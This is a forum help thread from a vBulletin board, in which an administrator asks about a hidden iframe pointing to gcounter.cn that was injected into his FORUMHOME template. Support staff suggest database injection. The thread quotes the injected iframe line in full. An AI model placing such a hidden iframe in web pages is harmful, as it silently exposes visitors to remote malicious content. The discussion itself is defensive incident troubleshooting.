Strange iframe in FORUMHOME

Collapse
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • Markowitch
    New Member
    • Nov 2005
    • 28
    #1

    Strange iframe in FORUMHOME

    Hi guyz

    The IE users on my board started to complain about IE blocking some content on my site. Yesterday it was something with "Data Remote Access" and today it was "Microsoft Vector Graphics Rendering (VML)".

    Inspired by the following article:
    http://msmvps.com/blogs/hostsnews/archive/2007/09/13/can-you-spot-the-fake.aspx


    I began searching for the "hidden iframe" as the article above talked about and I found it in FORUMHOME.

    Code:
    <body>
<iframe src=http://gcounter.cn style=display:none></iframe>
$header
$navbar
    What is this iframe doing, and why is it still present even after i revert the template to its original content?

    BTW: Im using vBulleting 3.7.2 Patch Level 1
    Last edited by Markowitch; Wed 13 Aug '08, 1:14pm. Reason: Added vbulletin version
    Tags: hackers method.
    • Steve Machol
      Former Customer Support Manager
      • Jul 2000
      • 154488
      #2
      There is no iframe in the default vB templates. This is from a modification.
      Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
      Change CKEditor Colors to Match Style (for 4.1.4 and above)

      Steve Machol Photography

      Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


        Comment

        • Markowitch
          New Member
          • Nov 2005
          • 28
          #3
          Originally posted by Steve Machol
          There is no iframe in the default vB templates. This is from a modification.
          How come that this iframe is there when the FORUMHOME template was listed as "Unchanged From the Default Style" ?

          When I view the original FORUMHOME template I can se the hidden iframe in the template. This is VERY strange since you say that it's not in there by default...

            Comment

            • Zachery
              Former vBulletin Support
              • Jul 2002
              • 59097
              #4
              Someone injected the html directly into the database.

                Comment

                • Markowitch
                  New Member
                  • Nov 2005
                  • 28
                  #5
                  Originally posted by Zachery
                  Someone injected the html directly into the database.
                  I hope that vbulletin or any of its third parti plugins isn't the weak link here. But of cause vbulletin is not responsible for the security holes, if any, introduced by plugins.

                  Have any heard about the injected iframe issue before? And is there any common pattern to this attack? It's times like this I wish there was some MySQL query log accessible from ISP... Well, thanks for your answers.
                  Last edited by Markowitch; Wed 13 Aug '08, 9:32pm. Reason: Added bold to "if any"

                    Comment

                    Previous template Next
                    widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                    Working...